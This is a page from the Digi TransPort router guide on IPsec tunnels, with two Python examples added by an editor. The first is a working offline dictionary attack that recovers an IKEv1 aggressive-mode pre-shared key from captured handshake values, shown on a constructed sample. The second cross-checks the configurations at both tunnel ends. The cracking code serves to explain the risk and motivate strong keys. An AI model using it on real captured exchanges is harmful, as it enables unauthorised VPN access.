Virtual Private Networks (VPN) IPsec
Digi TransPort WR Routers User Guide
192
Aggressive mode is faster than main mode (three messages instead of six), but it is not as secure,
because the device and its peer exchange their IDs and the authentication hash in clear text rather
than under the encryption that main mode establishes first. With pre-shared key authentication that
hash is derived from the pre-shared key, so anyone who captures the exchange can try to recover the
key offline. Aggressive mode is usually used when one or both of the devices have a dynamic external
IP address, because main mode with a pre-shared key identifies the peer by its IP address, which a
dynamic-address peer cannot supply in advance.
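The following Python example is added here by the editor and is not part of the Digi guide or Digi's software. It shows concretely why the clear-text hash matters: it reproduces the RFC 2409 pre-shared-key derivation of HASH_R, the value the responder sends unencrypted in aggressive-mode message 2, and recovers the pre-shared key from a constructed sample exchange with an offline dictionary attack. All field contents (SA body, Diffie-Hellman values, nonces, cookies, the name hub.example.com and the candidate word list) are constructed for the example; the prf is assumed to be HMAC-SHA1, as it is for a SHA-1 proposal.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf for a SHA-1 proposal: HMAC-SHA1 (RFC 2409 section 3.2)."""
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class AggressiveExchange:
    """Everything below travels unencrypted in aggressive-mode messages 1 and 2.

    Names follow RFC 2409; the _b suffix means 'payload body without the
    generic payload header'.
    """
    sai_b: bytes    # initiator's SA payload body (proposal and transforms)
    gxi: bytes      # initiator's Diffie-Hellman public value (KE payload)
    gxr: bytes      # responder's Diffie-Hellman public value
    ni_b: bytes     # initiator nonce
    nr_b: bytes     # responder nonce
    cky_i: bytes    # initiator cookie from the ISAKMP header (8 bytes)
    cky_r: bytes    # responder cookie (8 bytes)
    idir_b: bytes   # responder's ID payload body
    hash_r: bytes   # HASH_R as sent by the responder in message 2


def compute_hash_r(psk: bytes, ex: AggressiveExchange) -> bytes:
    """HASH_R for pre-shared-key authentication (RFC 2409 sections 5.1 and 5.4).

    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    """
    skeyid = prf(psk, ex.ni_b + ex.nr_b)
    return prf(skeyid, ex.gxr + ex.gxi + ex.cky_r + ex.cky_i + ex.sai_b + ex.idir_b)


def crack_psk(ex: AggressiveExchange, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate key and
    compare it with the observed value. No packets are sent to either peer."""
    for cand in candidates:
        if hmac.compare_digest(compute_hash_r(cand, ex), ex.hash_r):
            return cand
    return None


def _fill(label: str, n: int) -> bytes:
    """Deterministic stand-in bytes for the constructed sample exchange."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(label.encode() + bytes([counter])).digest()
        counter += 1
    return out[:n]


def simulated_capture(psk: bytes) -> AggressiveExchange:
    """Constructed sample of what a packet capture would yield. HASH_R is
    computed honestly by a 'responder' that knows the real PSK; every other
    field is public by design, so only hash_r depends on the key."""
    fields = dict(
        sai_b=_fill("sa", 56),      # one proposal with one transform, opaque here
        gxi=_fill("g^xi", 128),     # 1024-bit public values (DH group 2 sized)
        gxr=_fill("g^xr", 128),
        ni_b=_fill("Ni", 20),
        nr_b=_fill("Nr", 20),
        cky_i=_fill("cky-i", 8),
        cky_r=_fill("cky-r", 8),
        # ID payload body: type ID_FQDN (2), protocol 0, port 0, then the name
        idir_b=bytes([2, 0, 0, 0]) + b"hub.example.com",
    )
    partial = AggressiveExchange(hash_r=b"", **fields)
    return AggressiveExchange(hash_r=compute_hash_r(psk, partial), **fields)


if __name__ == "__main__":
    capture = simulated_capture(b"Winter2019")
    wordlist = [b"password", b"letmein", b"digi", b"Winter2019", b"admin"]
    print("recovered PSK:", crack_psk(capture, wordlist))
```

A passive observer needs nothing more than the two aggressive-mode packets; the same computation is what tools such as ike-scan's psk-crack perform. The practical defence when aggressive mode is unavoidable is a long, random pre-shared key that no word list will contain, or certificate-based authentication where the equipment supports it.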
Phase 2
In phase 2 (quick mode), IKE negotiates the SAs for IPsec itself. This creates two unidirectional SAs,
one for each direction of traffic. Once the phase 2 negotiation is complete, the IPsec tunnel is
established and protected traffic can flow.
IPsec and IKE renegotiation
To limit the damage if a key is compromised, the IPsec SAs and the IKE SA are renegotiated (rekeyed)
at a regular interval, the SA lifetime. Each renegotiation produces fresh encryption keys for the
IPsec tunnel, so a compromised key exposes only the traffic sent during its lifetime.
IPsec and XAuth
XAuth (eXtended Authentication) pre-shared key authentication mode provides additional security by
requiring client authentication credentials (a username and password) in addition to the standard
pre-shared key. TransPort devices can act as either an XAuth client or an XAuth server.
Configure an IPsec tunnel
Configuring an IPsec tunnel with a remote device involves configuring the following items:
Required configuration items
• IPsec tunnel configuration items:
  - Enabling the IPsec tunnel. IPsec tunnels are disabled by default. You can also set the
    IPsec tunnel state to off or on.
  - The IP address or name of the remote device, also known as the peer, at the other end of
    the IPsec tunnel.
  - The local and remote IDs at either end of the IPsec tunnel. The local ID must match the
    remote ID configured on the remote device, and the remote ID must match the local ID
    configured on the remote device.
  - The local and remote IP networks at either end of the IPsec tunnel.
  - The authentication mode: either pre-shared key authentication or XAuth and pre-shared
    key authentication. For information about XAuth and pre-shared key authentication, see
    IPsec XAuth authentication.
  - The shared key the device and the remote device use to authenticate each other.
  - The Encapsulating Security Payload (ESP) encryption protocol to use. This must match the
    encryption protocol configured on the remote device.
  - The ESP authentication protocol to use. This must match the authentication protocol
    configured on the remote device.
  - The ESP Diffie-Hellman group for the IPsec tunnel. This must match the Diffie-Hellman
    group configured on the remote device. The larger the group (the number of bits in the
    modulus), the harder the tunnel's keys are to break. However, a larger group requires
    more computing power, which can slow down tunnel negotiation and performance.
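Most failed tunnels come from the "must match" rules above being violated at one end, so the following Python example, added by the editor and not part of the Digi guide or the TransPort firmware, cross-checks the settings of both ends before they are typed into the devices. The field names (local_id, remote_id, esp_enc, dh_group and so on) and the sample hub/spoke values are this example's own and are not TransPort CLI parameter names. It goes slightly beyond the list: besides confirming that symmetric parameters match and that the IDs and networks cross over correctly, weak_settings() flags choices that are consistent but weak (obsolete ciphers, small Diffie-Hellman groups, short keys); those thresholds are the editor's advice, not the guide's.

```python
from typing import Dict, List

TunnelConfig = Dict[str, object]

# Parameters that must be identical at both ends of the tunnel.
SYMMETRIC = ("auth_mode", "psk", "esp_enc", "esp_auth", "dh_group")
# Parameters that cross over: our local value is the peer's remote value.
CROSSED = (("local_id", "remote_id"), ("local_net", "remote_net"))


def check_tunnel_pair(a: TunnelConfig, b: TunnelConfig) -> List[str]:
    """Return the mismatches that would make phase 1 or phase 2 fail.

    An empty list means the two ends describe the same tunnel."""
    problems: List[str] = []
    for f in SYMMETRIC:
        if a.get(f) != b.get(f):
            problems.append(f"{f} differs: A={a.get(f)!r} B={b.get(f)!r}")
    for local, remote in CROSSED:
        # A's local must be B's remote, and A's remote must be B's local.
        if a.get(local) != b.get(remote):
            problems.append(f"A.{local}={a.get(local)!r} must equal B.{remote}={b.get(remote)!r}")
        if a.get(remote) != b.get(local):
            problems.append(f"A.{remote}={a.get(remote)!r} must equal B.{local}={b.get(local)!r}")
    return problems


def weak_settings(cfg: TunnelConfig) -> List[str]:
    """Advisory checks (editor's thresholds, not the guide's): settings that will
    negotiate fine but are considered broken or too small today."""
    warnings: List[str] = []
    if cfg.get("esp_enc") in ("DES", "3DES"):
        warnings.append(f"esp_enc {cfg['esp_enc']} is obsolete; use AES")
    if cfg.get("esp_auth") == "MD5":
        warnings.append("esp_auth MD5 is obsolete; use SHA-1 at minimum, preferably SHA-256")
    if isinstance(cfg.get("dh_group"), int) and cfg["dh_group"] <= 2:
        # Group 1 is a 768-bit modulus, group 2 is 1024 bits; group 14 is 2048 bits.
        warnings.append(f"dh_group {cfg['dh_group']} is 1024 bits or less; use 14 or higher")
    if isinstance(cfg.get("psk"), (bytes, str)) and len(cfg["psk"]) < 20:
        warnings.append("psk is short; an aggressive-mode capture can be brute-forced offline")
    return warnings


# Constructed sample: a hub and one spoke that agree with each other.
HUB: TunnelConfig = dict(
    local_id="hub.example.com", remote_id="spoke1.example.com",
    local_net="10.0.0.0/24", remote_net="10.1.0.0/24",
    auth_mode="PSK", psk="correct horse battery staple pineapple",
    esp_enc="AES", esp_auth="SHA256", dh_group=14,
)
SPOKE: TunnelConfig = dict(
    local_id="spoke1.example.com", remote_id="hub.example.com",
    local_net="10.1.0.0/24", remote_net="10.0.0.0/24",
    auth_mode="PSK", psk=HUB["psk"],
    esp_enc="AES", esp_auth="SHA256", dh_group=14,
)


def misconfigured_spoke() -> TunnelConfig:
    """Same spoke with two typical mistakes: a truncated peer ID and a DH group
    that does not match the hub (and is too small)."""
    bad = dict(SPOKE)
    bad["remote_id"] = "hub"
    bad["dh_group"] = 2
    return bad


if __name__ == "__main__":
    print("hub/spoke problems:", check_tunnel_pair(HUB, SPOKE))
    for p in check_tunnel_pair(HUB, misconfigured_spoke()):
        print("mismatch:", p)
    for w in weak_settings(misconfigured_spoke()):
        print("warning:", w)
```

Run the checker against both ends' intended settings before configuring the devices; a mismatch in any SYMMETRIC field fails the relevant IKE proposal, while a crossed-ID mismatch typically shows up as the responder rejecting the initiator's ID even though the pre-shared key is correct.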